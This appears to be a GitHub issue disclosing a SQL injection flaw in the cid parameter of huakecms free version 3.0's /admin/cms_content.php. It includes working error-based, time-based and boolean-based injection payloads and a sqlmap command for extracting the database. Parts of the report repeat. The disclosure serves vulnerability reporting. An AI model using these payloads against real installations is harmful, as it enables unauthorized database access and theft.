You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
华科网站管理系统免费版3.0(huakecms free version 3.0) is a set of intelligent website building software based on PHP! The product has the characteristics of novel and beautiful interface, dynamic and fashionable, etc. It is a CMS content management system serving small and medium-sized enterprises. The threshold for using the software is low, no professional computer knowledge is required, full back-end operation management, simple operation and powerful functions, and the software also has extremely Strong scalability, can adapt to different needs of various industries.
[Suggested description]
huakecms free version 3.0 was discovered to contain SQL injection vulnerability in /admin/cms_content.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product] http://www.huakecms.com/
[Affected Product Code Base]
huakecms free version Dev 3.0
[Affected Component]
File: /admin/cms_content.php
Parameter: cid
[Attack Type]
Remote
2.copy the data package to create a text file "sql.txt" in the directory of sqlmap(The system has relatively complex cookie authentication and session authentication. Therefore, despite get-type injection, it is still recommended to provide data packets to sqlmap to improve the success rate.)
3.run the coomand
python sqlmap.py -r sql.txt --current-db --risk=3 --level=5
After the probe is completed, SQL injection vulnerability is found in the cid parameter,and the current database is obtained
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://localhost:8081/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 OR (SELECT 2163 FROM(SELECT COUNT(*),CONCAT(0x71626a7871,(SELECT (ELT(2163=2163,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://localhost:8081/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 2134 FROM (SELECT(SLEEP(5)))xZJI)
[Cause of vulnerability]
In /admin/cms_content.php, notice the following code
When $_GET[‘search’] exists and $_GET[‘cid’] is not 0,
You can execute get_channel($_GET['cid'],'n_child').')
2. Locate the get_channel() function and find it in the /system/config.php file, and find that there are SQL statements that are not protected by single quotes.
3.$t0 is the content of the incoming parameter $_GET[‘cid’], which is controllable, so it is judged that there are time blind injection and logical blind injection.
华科网站管理系统免费版3.0(huakecms free version 3.0) is a set of intelligent website building software based on PHP! The product has the characteristics of novel and beautiful interface, dynamic and fashionable, etc. It is a CMS content management system serving small and medium-sized enterprises. The threshold for using the software is low, no professional computer knowledge is required, full back-end operation management, simple operation and powerful functions, and the software also has extremely Strong scalability, can adapt to different needs of various industries.
[Suggested description]
huakecms free version 3.0 was discovered to contain SQL injection vulnerability in /admin/cms_content.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
http://www.huakecms.com/
[Affected Product Code Base]
huakecms free version Dev 3.0
[Affected Component]
File: /admin/cms_content.php
Parameter: cid
[Attack Type]
Remote
[poc]
http://localhost:8086/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 3158 FROM (SELECT(SLEEP(5)))YkeQ)
[Vulnerability demonstration]
1.After logging in as an administrator account, access
http://localhost:8081/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1*
And capture the data package with burpsuite
the captured data package:
2.copy the data package to create a text file "sql.txt" in the directory of sqlmap(The system has relatively complex cookie authentication and session authentication. Therefore, despite get-type injection, it is still recommended to provide data packets to sqlmap to improve the success rate.)
3.run the coomand
python sqlmap.py -r sql.txt --current-db --risk=3 --level=5
After the probe is completed, SQL injection vulnerability is found in the cid parameter,and the current database is obtained
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://localhost:8081/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND 5655=5655
[Cause of vulnerability]
3.$t0 is the content of the incoming parameter $_GET[‘cid’], which is controllable, so it is judged that there are time blind injection and logical blind injection.
[poc]
http://localhost:8086/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 3158 FROM (SELECT(SLEEP(5)))YkeQ)
The text was updated successfully, but these errors were encountered: